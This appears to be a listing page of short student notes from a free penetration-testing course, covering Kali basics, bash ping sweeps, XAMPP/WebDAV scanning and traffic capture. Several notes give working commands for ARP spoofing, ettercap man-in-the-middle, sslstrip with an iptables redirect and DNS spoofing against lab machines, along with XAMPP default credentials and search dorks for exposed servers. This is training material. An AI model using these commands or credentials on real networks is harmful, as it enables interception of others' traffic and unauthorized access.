Advanced Penetration Testing Notes

6

zervit directory traversal snmp VRFY 551 not local user(scriptare) [view]

By: 4nzu | Related Lesson: Vulnerability Scanning (part 6) Directory Transversals | Modified: January 7, 2017

webapp vuln

xampp: cadaver <ip\url>/webdav default user: wamp pass xampp dork: inurl:/xampp/lang.tmp inurl:/xampp/ inurl:/webdav /phpmyadmin # utility nikto [view]

By: 4nzu | Related Lesson: Vulnerability Scanning (part 5) WebApp, XAMPP, WEBDAV, nikto | Modified: January 7, 2017

Bash Scripting

Introduction We will start with a ping sweep This will let us get a reply from something such as a website If we wanted to see which hosts are alive (so Ping) then we can create a bash script Bash Script  use nano to create a bash script We need [view]

By: jburr032 | Related Lesson: Programming (part 2) Bash Scripting and If/Then Command | Modified: January 7, 2017

Command line

pwd => directory of me [view]

By: Mohamed Ahmed Mohamed Hassan | Related Lesson: Linux (part 2) Kali Linux Commands | Modified: January 5, 2017

KALI LINUX

Kali Linux is different from other programs in that it only has root users, is made for Pen testing 1. open terminal :root@kali 2. commands: pwd ( print name of current directory) man pwd (more inf ) man ls (last directory contens )       [view]

By: wanderflash | Related Lesson: Linux (part 2) Kali Linux Commands | Modified: January 4, 2017

ssl stripping

ettercap does its own arpspoofing use arpspoof between gateway and windows 7 iptables -t nat -A PREROUTING -p tcp –destination-port 80 REDIRECT –to-port 8080 sslstrip -l 8080 anything on port 80 redirecting to 8080 [view]

By: sau206 | Related Lesson: Traffic Capture (part 6) SSL Stripping | Modified: January 4, 2017

ettercap

started arpspoof 192.168.1.23 – windows 7 machine (target) ettercap -Ti eth0 -M arp:remote /192.168.1.1/ /192.168.1.23/ does arpspoofing by itself. have to make configuration changes in ettercap 1) nano /etc/ettercap/etter.conf ec_uid = 0     [view]

By: sau206 | Related Lesson: Traffic Capture (part 5) ettercap | Modified: January 4, 2017

dns spoofing

dns spoofing 192.168.1.1 –  router 192.168.1.80 -ubuntu system(target) arpspoof -i eth0 -t 192.168.1.80 192.168.1.1 arpspoof -i eth0 -t 192.168.1.1 192.168.1.80 in above syntax first ip is target and second ip is what you want to pretend to be [view]

By: sau206 | Related Lesson: Traffic Capture (part 4) DNS | Modified: January 4, 2017

n

s [view]

By: 4nzu | Related Lesson: Vulnerability Scanning (part 3) Nmap Scripting Engine | Modified: January 30, 2017

ARP spoofing

arpspoof 192.168.1.76 – xp machine target is xp and we are telling it that we are ubuntu(192.168.1.80) have to run in two consoles arpspoof -i eth0 -t 192.168.1.76 192.168.1.80 arpspoof -i eth0 -t 192.168.1.80 192.168.1.76 on ubuntu system arp [view]

By: sau206 | Related Lesson: Traffic Capture (part 3) Address Resolution Protocol ARP | Modified: January 4, 2017

« First ‹ Previous 1 93 183 191 192 193 194 195 203 243 Next › Last »

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge

 

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel